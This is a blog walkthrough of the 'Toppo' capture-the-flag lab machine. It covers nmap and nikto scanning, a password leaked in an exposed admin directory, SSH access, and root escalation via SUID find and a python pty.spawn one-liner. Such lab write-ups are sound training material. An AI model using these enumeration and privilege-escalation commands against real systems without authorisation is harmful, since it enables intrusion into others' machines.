Friday, September 18, 2020

CTF Machine - Toppo

 ﷽

Machine : Toppo
Duration :  15-20 Minutes (approximately)

Meet Toppo ...

1. Preparation :

Check my own IP.
ifconfig


Discover neighbours IP.
nmap -sn 192.168.56.0/24


2. Enumeration :

nmap -sC -A -p- 192.168.56.105



Found several open ports 22, 80, 111 & 58733. Lets try to browse the web server service (tcp/80) :

Also try to view the source code, looking for some interresting information, but no luck.


Meanwhile ... also look for any possible exploits for the identified services :

OpenSSH 6.7P1 (tcp/22) :

Apache httpd 2.4.10 (tcp/80) :


Examine web server : nikto -host http://192.168.56.105
and found admin directory and then mail.


Accessing admin directory which is in listing mode :

Inside admin directory, we found text file notes.txt, which might content user and password information.
Possible user and password information :
User : ted
Password : 12345ted123

While inside mail directory, we found .php file which is only returning No arguments Provided!

Performing access using ssh service, and got low level shell access.


Identifying system : uname -a and cat /etc/issue.net


Searching for usable executable files which authorized for user ted.
find / -perm -u=s 2>/dev/null


Python is potential escalation vector, but first lets try using find.
find / -name sp8 -exec /bin/bash \; or find / -name sp8 -exec /bin/sh \;


Failed attempt using find, lets try using the well known python shell spawn.
we can use python oneliner like python -c 'import pty; pty.spawn("/bin/sh")' or running python script.
echo 'import pty; pty.spawn("/bin/sh")' > sp8.py
python sp8.py



And we got root, while the flag.txt is simply can be found at the /root directory.

Finish ...

Thank you and Greets Hadi Mene.

No comments:

40 Hadist Seputar Keluarga Samawa (Bagian 3)

 ﷽ Ustadz Yusuf Abu Ubaidah As-Sidawi hafizahullohuta'ala Masjid Al-Aziz  Jl. Soekarno Hatta No. 662 Bandung Hadist 11 : Doa Orangtua Bu...